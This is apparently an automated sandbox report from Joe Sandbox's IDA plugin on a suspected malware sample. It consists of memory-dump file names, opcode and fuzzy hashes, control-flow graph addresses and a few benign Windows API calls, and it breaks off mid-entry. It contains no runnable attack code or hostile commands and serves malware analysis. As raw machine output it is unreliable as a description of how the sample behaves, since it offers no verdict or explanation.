                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^78
                                                                                                                • API String ID: 0-256392365
                                                                                                                • Opcode ID: 5ee2df22ecab144f1fca6a1f6167621f52fd39163a409f55ea3523bbcd852c75
                                                                                                                • Instruction ID: eae92ad8ee8fbed397ca3e4a28ac369191c14ea2d4d65a940e5fd08ff3664afe
                                                                                                                • Opcode Fuzzy Hash: 5ee2df22ecab144f1fca6a1f6167621f52fd39163a409f55ea3523bbcd852c75
                                                                                                                • Instruction Fuzzy Hash: F27184B5E01618CFEB58CF66C944B9EBBF2AF89300F14C5AAD40CA7265DB344A85CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717298092.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_160000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 313621889ad0012182189c1ac03f312232cd993baaf29af268fdae45bd36a5bd
                                                                                                                • Instruction ID: 703a92bc1bc408736d79e92bc8ad4f739b32d99eb3de054672a53f93c7d09387
                                                                                                                • Opcode Fuzzy Hash: 313621889ad0012182189c1ac03f312232cd993baaf29af268fdae45bd36a5bd
                                                                                                                • Instruction Fuzzy Hash: 31926D70A04209DFCB15CFA8C994AAEBBF6BF88310F15855AE405DB361DB35ED61CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717298092.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_160000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 38bd49d9b00296432f92d1718cad8b10e680b5dda8563d6e3525959891e336d9
                                                                                                                • Instruction ID: 8f4695aca4176f3be04a7f1b8bbfaf4cf68a483bd19feb8d343293a255136362
                                                                                                                • Opcode Fuzzy Hash: 38bd49d9b00296432f92d1718cad8b10e680b5dda8563d6e3525959891e336d9
                                                                                                                • Instruction Fuzzy Hash: 56725E70A002199FDB14DFA9C894AAEBBF6FF89300F158169E805EB3A1DB34DD51DB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747576107.0000000039470000.00000040.00000800.00020000.00000000.sdmp, Offset: 39470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_39470000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b060054ecfb75d3354559e2a934eed2409c7f5d26d21bdd867323d07eb119a77
                                                                                                                • Instruction ID: d134741a289488ea84310044db1545d763763e7f2b1b7cb3ae76f875875815b8
                                                                                                                • Opcode Fuzzy Hash: b060054ecfb75d3354559e2a934eed2409c7f5d26d21bdd867323d07eb119a77
                                                                                                                • Instruction Fuzzy Hash: 1982D374A01228CFDB65DF64C855BA9BBB2FF8A300F5081E9D809A7350DB359E92DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67182f317959e6c222e2ce64627c7a2d37a2e2b7a6b4a7547be784d948e0c81f
                                                                                                                • Instruction ID: 92befef36f908d3253f99ecce8a0f8fa39d0d0ae18337bf0c229325a750b39aa
                                                                                                                • Opcode Fuzzy Hash: 67182f317959e6c222e2ce64627c7a2d37a2e2b7a6b4a7547be784d948e0c81f
                                                                                                                • Instruction Fuzzy Hash: 1B72E474A01228CFDB64DF64C955B99BBB2FF8A301F5081E9D80AA7350CB359E92DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 58c61e4267952a6b85383f47ed46597483c1e2b4c9eb3e1454fd0dffd1e693b7
                                                                                                                • Instruction ID: 07012b816f0d7e44f6d05e2692bfd78111249d147f99cff49231bef6694f76fe
                                                                                                                • Opcode Fuzzy Hash: 58c61e4267952a6b85383f47ed46597483c1e2b4c9eb3e1454fd0dffd1e693b7
                                                                                                                • Instruction Fuzzy Hash: 0672A074E01229CFEB64DF69C984BD9BBB2BB49300F5085EAD409A7351DB349E82CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 943dbe78dcce462129445cde6e35a909ff83008c5978d26041f18b5dac9bc1ff
                                                                                                                • Instruction ID: 3cf0ddaca0a3c42a35d6e69e7d89160f314c9960a7c640b8b6ef380ddec4ad01
                                                                                                                • Opcode Fuzzy Hash: 943dbe78dcce462129445cde6e35a909ff83008c5978d26041f18b5dac9bc1ff
                                                                                                                • Instruction Fuzzy Hash: 7DE1E274E01218CFEB54DFA9C984B9DBBB2BF89304F6080A9D409B7395DB355A86CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3bff8456d884e3d63f52a6293f365855f356a0c3c30bc3a94a7306874892565d
                                                                                                                • Instruction ID: 2dfa3f37d3060873e6fdc2a90a596234980f1c44c27ae42943d5209c5a77cf02
                                                                                                                • Opcode Fuzzy Hash: 3bff8456d884e3d63f52a6293f365855f356a0c3c30bc3a94a7306874892565d
                                                                                                                • Instruction Fuzzy Hash: 48D1DF74E01218CFEB54DFA9C895B9DBBB2BF89305F5080A9D809B7355DB355A82CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 00eef84e4108f1204a1e6370481c1a8ccdfae90231e128712663536a10346565
                                                                                                                • Instruction ID: f518ccc20a870b32be6da0fa0e44a936e0cbf0cd1643455df6a2fd296d1700a7
                                                                                                                • Opcode Fuzzy Hash: 00eef84e4108f1204a1e6370481c1a8ccdfae90231e128712663536a10346565
                                                                                                                • Instruction Fuzzy Hash: C191DD74900208CFEB10DFA8C898B9CBBB1BF49314F20926AE449BB395DB759985CF54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e2bcbeafaceaaa42addc5206757e16d614b312b50054bc8fb03258e5a37f5004
                                                                                                                • Instruction ID: b6a4cbe57ab62fb1e91e7d269a6f036ee961dbac1f927dc9e6933567aa28727e
                                                                                                                • Opcode Fuzzy Hash: e2bcbeafaceaaa42addc5206757e16d614b312b50054bc8fb03258e5a37f5004
                                                                                                                • Instruction Fuzzy Hash: 0E81C475E01208CBEB14DFE9D99069DBBF2FF88310F24852AD818AB359DB359946CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717298092.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_160000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1786a9d1d46ffdc9e2fc1cb1d5893744cf48ac57868d5548d16e269d32239b1a
                                                                                                                • Instruction ID: ab852747672582c271ffdac137610769d6c0e70107756ffa01d2e7735e3c1569
                                                                                                                • Opcode Fuzzy Hash: 1786a9d1d46ffdc9e2fc1cb1d5893744cf48ac57868d5548d16e269d32239b1a
                                                                                                                • Instruction Fuzzy Hash: 4681C474E00218DFEB18DFA9D884A9DBBF2BF89300F14D169E819AB365DB349951CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 159ee2a73f3029adb968422c078497db51f8a5694836298a2e3727440cc3f0ab
                                                                                                                • Instruction ID: e9a63db18a5fecfc5dbe34cbbb8342887fbcbebf46230d3a2b44613f566908ae
                                                                                                                • Opcode Fuzzy Hash: 159ee2a73f3029adb968422c078497db51f8a5694836298a2e3727440cc3f0ab
                                                                                                                • Instruction Fuzzy Hash: B771D575E02228CFDB64CF66C9847DDBBB2BF89301F1095AAD408A7350DB349A86CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747576107.0000000039470000.00000040.00000800.00020000.00000000.sdmp, Offset: 39470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_39470000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2551143b1a6cbdcd142e39d18bbd08f72b11172d93270752f8836e0e851074a7
                                                                                                                • Instruction ID: 12267750d1ab5bb2222f4f5a966e19ef2abf1dd7326bae08e1e295c9ce37a8f0
                                                                                                                • Opcode Fuzzy Hash: 2551143b1a6cbdcd142e39d18bbd08f72b11172d93270752f8836e0e851074a7
                                                                                                                • Instruction Fuzzy Hash: 3D612634A40219CFEB65DFA4C855BADFBB2FB88300F5080A9990A67751DB355E92EF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f1013963550ded45d6c1e62de765fb40b6d940835cb5bdf1f18a0889ef78b8ba
                                                                                                                • Instruction ID: cd8e03dcd615d70e2ce11ba084d87224f3f122204b31ca95e322be0524fa0b77
                                                                                                                • Opcode Fuzzy Hash: f1013963550ded45d6c1e62de765fb40b6d940835cb5bdf1f18a0889ef78b8ba
                                                                                                                • Instruction Fuzzy Hash: 7A4149B1D016188BEB58CF6BC9457CAFAF3AFC9200F14C1AAD54CA7265DB740A868F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 405beb071f705e252abe7e66486866a7e80a6ae01e0af8907fa9359600d26c37
                                                                                                                • Instruction ID: 97f8917c6e6b5a3a11c84d963e0fbbf5e038f4f336d9774e2ee3a76639d879e5
                                                                                                                • Opcode Fuzzy Hash: 405beb071f705e252abe7e66486866a7e80a6ae01e0af8907fa9359600d26c37
                                                                                                                • Instruction Fuzzy Hash: C8417CB1E016188FEB58CF67C945799FAF3AFC9200F14C1AAC50CA7265DB7409868F50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 114 39470978-39470a0f GetCurrentProcess 118 39470a11-39470a17 114->118 119 39470a18-39470a4c GetCurrentThread 114->119 118->119 120 39470a55-39470a89 GetCurrentProcess 119->120 121 39470a4e-39470a54 119->121 123 39470a92-39470aaa 120->123 124 39470a8b-39470a91 120->124 121->120 135 39470aad call 39470b57 123->135 136 39470aad call 39470f39 123->136 124->123 126 39470ab3-39470ae2 GetCurrentThreadId 128 39470ae4-39470aea 126->128 129 39470aeb-39470b4d 126->129 128->129 135->126 136->126
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 394709FE
                                                                                                                • GetCurrentThread.KERNEL32 ref: 39470A3B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 39470A78
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 39470AD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747576107.0000000039470000.00000040.00000800.00020000.00000000.sdmp, Offset: 39470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_39470000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: dfd554930a422734324dfee812b3d76976d961d2e90f59f0292bbb8e16e080b9
                                                                                                                • Instruction ID: a398ab87dccc2fc2ab5472f73d6b1338b640f8f2354fdb55ac8cb4374ff5421a
                                                                                                                • Opcode Fuzzy Hash: dfd554930a422734324dfee812b3d76976d961d2e90f59f0292bbb8e16e080b9
                                                                                                                • Instruction Fuzzy Hash: BD5155B49013498FDB44DFAAC548BDEBBF1BF88310F208559E419A7361DB789940CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 137 39470980-39470a0f GetCurrentProcess 141 39470a11-39470a17 137->141 142 39470a18-39470a4c GetCurrentThread 137->142 141->142 143 39470a55-39470a89 GetCurrentProcess 142->143 144 39470a4e-39470a54 142->144 146 39470a92-39470aaa 143->146 147 39470a8b-39470a91 143->147 144->143 158 39470aad call 39470b57 146->158 159 39470aad call 39470f39 146->159 147->146 149 39470ab3-39470ae2 GetCurrentThreadId 151 39470ae4-39470aea 149->151 152 39470aeb-39470b4d 149->152 151->152 158->149 159->149
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 394709FE
                                                                                                                • GetCurrentThread.KERNEL32 ref: 39470A3B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 39470A78
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 39470AD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747576107.0000000039470000.00000040.00000800.00020000.00000000.sdmp, Offset: 39470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_39470000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: ec5b4d0e908f908993ca0b52a1d0d0bea1655e9a6d3d256930117f603398b207
                                                                                                                • Instruction ID: cab1e3eccb36e7734958ced06afb36b2f241199fdc6bd66939a764b55b1bab0e
                                                                                                                • Opcode Fuzzy Hash: ec5b4d0e908f908993ca0b52a1d0d0bea1655e9a6d3d256930117f603398b207
                                                                                                                • Instruction Fuzzy Hash: 935155B49013098FDB44DFAAC548BDEBBF5BF88310F208519E419A7351DB78A940CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 160 38f47920-38f47941 161 38f47943 160->161 162 38f47948-38f4797e 160->162 161->162 165 38f47987-38f479ae 162->165 167 38f479b4-38f479cc 165->167 168 38f47b3d-38f47b46 165->168 171 38f47ae8-38f47b03 167->171 173 38f479d1-38f47ae7 171->173 174 38f47b09-38f47b2d 171->174 173->171 174->168
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <C78$<C78$<C78
                                                                                                                • API String ID: 0-1257147001
                                                                                                                • Opcode ID: 1bb9aa093fcb9cac93f13c59c40bd1076fcdf465b094b77cc6cca34ae716f577
                                                                                                                • Instruction ID: 7ef6b59e77d956dd5584ec4df66ebc8fecec542104559db73108a458cab73feb
                                                                                                                • Opcode Fuzzy Hash: 1bb9aa093fcb9cac93f13c59c40bd1076fcdf465b094b77cc6cca34ae716f577
                                                                                                                • Instruction Fuzzy Hash: B151DF74D01318CFEB14DFA5C854BADBBB2BF89301F608529E809AB354DB396A56DF40

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 192 394701c8-39470232 CreateWindowExW 194 39470234-3947023a 192->194 195 3947023b-39470273 192->195 194->195 199 39470275-39470278 195->199 200 39470280 195->200 199->200 201 39470281 200->201 201->201
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,0000000C,?,?,?), ref: 39470222
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747576107.0000000039470000.00000040.00000800.00020000.00000000.sdmp, Offset: 39470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_39470000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 716092398-4108050209
                                                                                                                • Opcode ID: ea89f19b70310c081ff21b497aafcfa807d517646de8a62b9c8b1438f0f62f79
                                                                                                                • Instruction ID: e910b17d9bcd2855de17c6cdcb38c6ddb22edc0bd5f2c921e11619f9f9f3dc66
                                                                                                                • Opcode Fuzzy Hash: ea89f19b70310c081ff21b497aafcfa807d517646de8a62b9c8b1438f0f62f79
                                                                                                                • Instruction Fuzzy Hash: 2E21D07580130CEFEF01DF94D884ADEBBB5BF48314F208109E914AB260CB76A845CF60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 306 38f4fab0-38f4fafe 311 38f4fb15-38f4fb1d 306->311 312 38f4fb00-38f4fb13 306->312 316 38f4fb24-38f4fb56 call 38f4ebfc 311->316 312->311 312->316 358 38f4fb58 call 3836f4e8 316->358 359 38f4fb58 call 3836f4c8 316->359 322 38f4fb5e-38f4fb88 325 38f4fba2-38f4fbdb call 38f4ec0c 322->325 326 38f4fb8a-38f4fb9d 322->326 336 38f4fc10-38f4fcd9 325->336 337 38f4fbdd-38f4fbec 325->337 327 38f4fdd9-38f4fddf 326->327 329 38f4fde1 327->329 330 38f4fde9 327->330 329->330 331 38f4fdea 330->331 331->331 360 38f4fcdc call 394700b7 336->360 361 38f4fcdc call 394700c0 336->361 337->336 340 38f4fbee-38f4fc08 337->340 340->336 353 38f4fce2-38f4fd3c 356 38f4fd47 353->356 357 38f4fd3e 353->357 356->327 357->356 358->322 359->322 360->353 361->353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: hG;6$g78
                                                                                                                • API String ID: 0-1187161832
                                                                                                                • Opcode ID: b27588d77ca300204befb93271c46435bfc6efaaf94ba5685c62b22b726339ab
                                                                                                                • Instruction ID: 8ea5d6d547c5f28405881b591095f2d41d5bc222865ec22923646359ba8a61bb
                                                                                                                • Opcode Fuzzy Hash: b27588d77ca300204befb93271c46435bfc6efaaf94ba5685c62b22b726339ab
                                                                                                                • Instruction Fuzzy Hash: 1971E575E01259CFDB05DFB5C9589ADBBB6FF89301F20852AE406AB350DB399942CF80

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 362 38f4dd30-38f4dd4a 363 38f4dd52-38f4dd5b 362->363 364 38f4dd4c-38f4dd51 362->364 366 38f4ddd3 363->366 367 38f4dd5d-38f4dd74 363->367 369 38f4ddd9-38f4dddb 366->369 367->366 376 38f4dd76-38f4dd95 call 38f4dab0 367->376 370 38f4dddd-38f4dde4 369->370 371 38f4ddea-38f4ddf1 call 38f4d998 369->371 370->371 372 38f4dfb6-38f4dfc2 370->372 371->372 377 38f4ddf7-38f4de16 call 38f4dab0 371->377 384 38f4dd97 376->384 385 38f4dd9e-38f4dda4 376->385 387 38f4de1f-38f4de25 377->387 388 38f4de18 377->388 384->385 385->366 386 38f4dda6-38f4ddad call 38f4d998 385->386 386->366 394 38f4ddaf-38f4ddb7 386->394 390 38f4de27 387->390 391 38f4de2e-38f4de4d call 38f4dab0 387->391 388->387 390->391 398 38f4de56-38f4de5c 391->398 399 38f4de4f 391->399 400 38f4ddc6 394->400 401 38f4ddb9-38f4ddc4 394->401 402 38f4de65-38f4de84 call 38f4dab0 398->402 403 38f4de5e 398->403 399->398 404 38f4ddc8-38f4ddca 400->404 401->404 410 38f4de86 402->410 411 38f4de8d-38f4de93 402->411 403->402 404->366 407 38f4ddcc 404->407 407->366 410->411 412 38f4de95 411->412 413 38f4de9c-38f4debb call 38f4dab0 411->413 412->413 417 38f4dec4-38f4deca 413->417 418 38f4debd 413->418 419 38f4ded3-38f4def2 call 38f4dab0 417->419 420 38f4decc 417->420 418->417 424 38f4def4 419->424 425 38f4defb-38f4df01 419->425 420->419 424->425 426 38f4df03 425->426 427 38f4df0a-38f4df29 call 38f4dab0 425->427 426->427 431 38f4df32-38f4df38 427->431 432 38f4df2b 427->432 433 38f4df41-38f4df4e call 38f4dab0 431->433 434 38f4df3a 431->434 432->431 437 38f4df50-38f4df66 call 38f4dc40 433->437 438 38f4df71-38f4df90 call 38f4dab0 433->438 434->433 447 38f4dfa8-38f4dfaf 437->447 448 38f4df68-38f4df6f 437->448 445 38f4df92 438->445 446 38f4df99-38f4df9f 438->446 445->446 446->447 449 38f4dfa1 446->449 447->372 448->447 449->447
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: J;6$K;6
                                                                                                                • API String ID: 0-1544466345
                                                                                                                • Opcode ID: 0ff03632b21c9be8ad63c49e7a1ddd964de4e49b9f9d8a823af7a0c54133e18c
                                                                                                                • Instruction ID: 88fb76ff4dd94b5543f9a47e604bb410616959d4711c66c3a0eef2eda58facff
                                                                                                                • Opcode Fuzzy Hash: 0ff03632b21c9be8ad63c49e7a1ddd964de4e49b9f9d8a823af7a0c54133e18c
                                                                                                                • Instruction Fuzzy Hash: B46173B4B05345CAEB00EFB1D85879D7FF6EF45388F45486AD401AB281EBB9C586CB60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 492 38f4faa1-38f4fafe 497 38f4fb15-38f4fb1d 492->497 498 38f4fb00-38f4fb13 492->498 502 38f4fb24-38f4fb56 call 38f4ebfc 497->502 498->497 498->502 546 38f4fb58 call 3836f4e8 502->546 547 38f4fb58 call 3836f4c8 502->547 508 38f4fb5e-38f4fb88 511 38f4fba2-38f4fbdb call 38f4ec0c 508->511 512 38f4fb8a-38f4fb9d 508->512 522 38f4fc10-38f4fcd9 511->522 523 38f4fbdd-38f4fbec 511->523 513 38f4fdd9-38f4fddf 512->513 515 38f4fde1 513->515 516 38f4fde9 513->516 515->516 517 38f4fdea 516->517 517->517 544 38f4fcdc call 394700b7 522->544 545 38f4fcdc call 394700c0 522->545 523->522 526 38f4fbee-38f4fc08 523->526 526->522 539 38f4fce2-38f4fd3c 542 38f4fd47 539->542 543 38f4fd3e 539->543 542->513 543->542 544->539 545->539 546->508 547->508
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: hG;6$g78
                                                                                                                • API String ID: 0-1187161832
                                                                                                                • Opcode ID: 76027c762573bdae5aa8b07fdbca73ff00ea8f6755bb2f98e711d37090b58305
                                                                                                                • Instruction ID: b3516dceb7068e362ca1a6d37c29c04fb9dfe194ed526c19f717d22914449d10
                                                                                                                • Opcode Fuzzy Hash: 76027c762573bdae5aa8b07fdbca73ff00ea8f6755bb2f98e711d37090b58305
                                                                                                                • Instruction Fuzzy Hash: F3316A79E00319CFDB09DBB5C4546ADBBF2AF89240F14892ED406EB350EB399842CF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 548 38f47911-38f47941 549 38f47943 548->549 550 38f47948-38f4797e 548->550 549->550 553 38f47987-38f479ae 550->553 555 38f479b4-38f479cc 553->555 556 38f47b3d-38f47b46 553->556 559 38f47ae8-38f47b03 555->559 561 38f479d1-38f47ae7 559->561 562 38f47b09-38f47b2d 559->562 561->559 562->556
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <C78$<C78
                                                                                                                • API String ID: 0-1217796500
                                                                                                                • Opcode ID: d97f1238d0ce5b36d295b2e8e2bd865c67a9e53fa956ae2cadccb9a617fc414f
                                                                                                                • Instruction ID: 2bf2cf6d1784cb4d6f839929702725255dbe40bb37c748fe57bb94923a59e8c7
                                                                                                                • Opcode Fuzzy Hash: d97f1238d0ce5b36d295b2e8e2bd865c67a9e53fa956ae2cadccb9a617fc414f
                                                                                                                • Instruction Fuzzy Hash: D23103B4D01318DEEB04DFA1D4447EEBBB2AF89304F50886AD414BB254DB79568ACB50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1473 39471dc0-39471dfc 1474 39471e02-39471e07 1473->1474 1475 39471eac-39471ecc 1473->1475 1476 39471e5a-39471e92 CallWindowProcW 1474->1476 1477 39471e09-39471e40 1474->1477 1481 39471ecf-39471edc 1475->1481 1479 39471e94-39471e9a 1476->1479 1480 39471e9b-39471eaa 1476->1480 1483 39471e42-39471e48 1477->1483 1484 39471e49-39471e58 1477->1484 1479->1480 1480->1481 1483->1484 1484->1481
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 39471E81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747576107.0000000039470000.00000040.00000800.00020000.00000000.sdmp, Offset: 39470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_39470000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: bd79c898abe9374bc5cf081e8ed51647f9db721c9505d536044bc039c71bccf8
                                                                                                                • Instruction ID: 4e042dfc2fd00960041af1b669c5587d7b7272da2e7208b1253ff24b0c61ded5
